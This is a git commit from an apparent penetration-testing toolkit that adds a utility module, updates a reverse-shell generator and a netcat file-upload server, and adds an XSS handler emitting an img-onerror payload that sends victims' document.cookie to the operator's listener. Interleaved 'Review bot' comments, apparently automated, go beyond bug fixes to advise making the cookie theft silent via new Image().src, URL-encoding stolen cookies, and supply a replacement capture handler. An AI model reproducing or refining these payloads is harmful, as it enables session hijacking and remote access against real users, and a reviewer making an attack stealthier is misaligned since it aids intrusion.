
xss + utils

Roman Hergenreder 3 years ago
parent
commit
712b851f36
5 changed files with 107 additions and 29 deletions
  1. 1 0
      .gitignore
  2. 14 14
      genRevShell.py
  3. 10 15
      upload_file.py
  4. 37 0
      util.py
  5. 45 0
      xss_handler.py

+ 1 - 0
.gitignore

@@ -0,0 +1 @@
+__pycache__

+ 14 - 14
genRevShell.py

@@ -3,16 +3,7 @@
 import socket
 import sys
 import subprocess
-import netifaces as ni
-
-def getLocalAddress():
-    interface = "tun0"
-    if not interface in ni.interfaces():
-        interface = ni.interfaces()[0]
-
-    addresses = ni.ifaddresses(interface)
-    address = addresses[next(iter(addresses))][0]["addr"]
-    return address
+import util
 
 def generatePayload(type, local_address, port):
 
@@ -38,14 +29,23 @@ def generatePayload(type, local_address, port):
 
 if __name__ == "__main__":
 
-    if len(sys.argv) < 3:
-        print("Usage: %s <type> <port>" % sys.argv[0])
+    if len(sys.argv) < 2:
+        print("Usage: %s <type> [port]" % sys.argv[0])
         exit(1)
 
-    listen_port = int(sys.argv[2])
+    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
     payload_type = sys.argv[1].lower()
 
-    local_address = getLocalAddress()
+    local_address = util.getAddress()
+
+    # choose random port
+    if listen_port is None:
+        sock = util.openServer(local_address)
+        if not sock:
+            exit(1)
+        listen_port = sock.getsockname()[1]
+        sock.close()
+
     payload = generatePayload(payload_type, local_address, listen_port)
 
     if payload is None:
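Review bot: The `if not sock: exit(1)` guard in the new random-port branch is dead code, because `util.openServer` either returns a bound socket or re-raises the bind exception, so a failed bind surfaces as a traceback instead of the clean exit this check implies. Either catch it here, `try: sock = util.openServer(local_address)` / `except OSError as e: sys.exit("Unable to listen: %s" % e)`, or change the helper to return None on its non-retry path. The probe socket is also closed before the payload is printed, so the port is only known to have been free at that instant and may be taken by the time the operator starts a listener; a comment such as `# port was free when probed; start your listener promptly` would make that explicit. `int(sys.argv[2])` still raises an unhandled ValueError for a non-numeric port. The `__main__` block continues past the end of the hunk.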

+ 10 - 15
upload_file.py

@@ -1,7 +1,8 @@
-import socket
+#!/usr/bin/python
+
 import sys
 import os
-import netifaces as ni
+import util
 
 if len(sys.argv) < 2:
     print("Usage: %s <file> [port]" % sys.argv[0])
@@ -9,22 +10,16 @@ if len(sys.argv) < 2:
 
 # Create a TCP/IP socket
 FILENAME = sys.argv[1]
-sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-interface = "tun0"
-if not interface in ni.interfaces():
-    interface = ni.interfaces()[0]
 
-addresses = ni.ifaddresses(interface)
-address = addresses[next(iter(addresses))][0]["addr"]
+# Bind the socket to the port or choose a random one
+address = util.getAddress()
+port = None if len(sys.argv) < 3 else int(sys.argv[2])
+sock = util.openServer(address, port)
+if not sock:
+    exit(1)
 
-# Bind the socket to the port
-port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])
-server_address = (address, port)
-sock.bind(server_address)
-sock.listen(1)
 print("Now listening, download file using:")
-print('nc %s %d > %s' % (address, port, os.path.basename(FILENAME)))
+print('nc %s %d > %s' % (address, sock.getsockname()[1], os.path.basename(FILENAME)))
 print()
 
 while True:
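Review bot: A bind failure on the requested port does not reach the `if not sock: exit(1)` check, because `util.openServer` re-raises when `ports` is an int rather than returning None, so the operator sees a traceback from the helper instead of a message. Wrap the call, `try: sock = util.openServer(address, port)` / `except OSError as e: sys.exit("Unable to listen on %s:%s: %s" % (address, port, e))`, or change the helper's contract and keep the guard. The `int(sys.argv[2])` conversion is likewise unchecked and raises ValueError for a non-numeric argument. The `while True:` loop that hands out the file begins on the last line of the hunk and its body is outside this view, so whether it closes the listener or limits itself to one client cannot be judged here.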

+ 37 - 0
util.py

@@ -0,0 +1,37 @@
+import random
+import socket
+import netifaces as ni
+
+def getAddress(interface="tun0"):
+    if not interface in ni.interfaces():
+        interfaces = ni.interfaces()
+        interfaces.remove('lo')
+        interface = interfaces[0]
+
+    addresses = ni.ifaddresses(interface)
+    address = addresses[ni.AF_INET][0]["addr"]
+    return address
+
+def openServer(address, ports=None):
+    listenPort = None
+    retry = True
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    while retry:
+
+        if isinstance(ports, int):
+            listenPort = ports
+            retry = False
+        elif isinstance(ports, range):
+            listenPort = random.randint(ports[0],ports[-1])
+        elif ports is None:
+            listenPort = random.randint(10000,65535)
+
+        try:
+            sock.bind((address, listenPort))
+            sock.listen(1)
+            return sock
+        except Exception as e:
+            if not retry:
+                print("Unable to listen on port %d: %s" % (listenPort, str(e)))
+            raise e
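Review bot: `openServer` never actually retries: the `except` block re-raises unconditionally, so a collision on a randomly chosen port or a port from `range` aborts the call instead of picking another port, and the `retry` flag only decides whether a message is printed first. Move the re-raise under the flag and let the loop continue otherwise, `except OSError as e:` / `    if not retry:` / `        print(...); raise` — catching `OSError` rather than `Exception` and using a bare `raise` also keeps the original traceback. Even with that fix, a `range` or `None` whose every port is busy loops forever, so the retry path should be bounded, for example by iterating a shuffled list of candidate ports and raising once it is exhausted. In `getAddress`, `interfaces.remove('lo')` raises ValueError on hosts without an interface literally named `lo` (macOS uses `lo0`), and `addresses[ni.AF_INET]` raises KeyError when the chosen interface has no IPv4 address; both need a guard or at least a docstring stating the assumption that the first non-loopback interface carries an IPv4 address.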

+ 45 - 0
xss_handler.py

@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+import util
+import sys
+import http.server
+import socketserver
+
+def generatePayload(type, address, port):
+    if type == "img":
+        return '<img src="#" onerror="javascript:document.location=\'http://%s:%d/?x=\'+document.cookie">' % (address, port)
+    else:
+        return None
+
+if __name__ == "__main__":
+
+    if len(sys.argv) < 2:
+        print("Usage: %s <type> [port]" % sys.argv[0])
+        exit(1)
+
+    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
+    payload_type = sys.argv[1].lower()
+
+    local_address = util.getAddress()
+
+    # choose random port
+    if listen_port is None:
+        sock = util.openServer(local_address)
+        if not sock:
+            exit(1)
+        listen_port = sock.getsockname()[1]
+        sock.close()
+
+    payload = generatePayload(payload_type, local_address, listen_port)
+    if not payload:
+        print("Unsupported payload type, choose one of: img")
+        exit(1)
+
+    print("Payload:")
+    print(payload)
+    print()
+
+    Handler = http.server.SimpleHTTPRequestHandler
+    with socketserver.TCPServer((local_address, listen_port), Handler) as httpd:
+        print("serving at port", listen_port)
+        httpd.serve_forever()
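Review bot: The `SimpleHTTPRequestHandler` passed to `TCPServer` serves the current working directory over HTTP to anyone who can reach `local_address`, so this cookie-exfiltration listener also exposes whatever files sit in the operator's cwd (other payloads, loot, notes) to the target network. The handler only needs to log the request line, which already carries the `?x=<cookie>` query; a minimal `BaseHTTPRequestHandler` that answers 204 and serves nothing is sketched below (`send_response` logs the request line to stderr by default). The payload should also wrap the cookie, `encodeURIComponent(document.cookie)`, since a `#` or `&` in a cookie value truncates or splits the query string, and `document.location=` visibly navigates the victim away where `new Image().src=` would be silent. The `if not sock: exit(1)` guard is unreachable here for the same reason as in genRevShell.py (`util.openServer` raises instead of returning None), and the probe port is released before `TCPServer` rebinds it.
```python
class CookieHandler(http.server.BaseHTTPRequestHandler):
    """Answer every request with 204 and serve no files; the request line
    (carrying ?x=<cookie>) is logged to stderr by send_response."""

    def do_GET(self):
        self.send_response(204)
        self.end_headers()

# … unchanged: argument parsing, port selection, payload printing …

    with socketserver.TCPServer((local_address, listen_port), CookieHandler) as httpd:
        print("serving at port", listen_port)
        httpd.serve_forever()
```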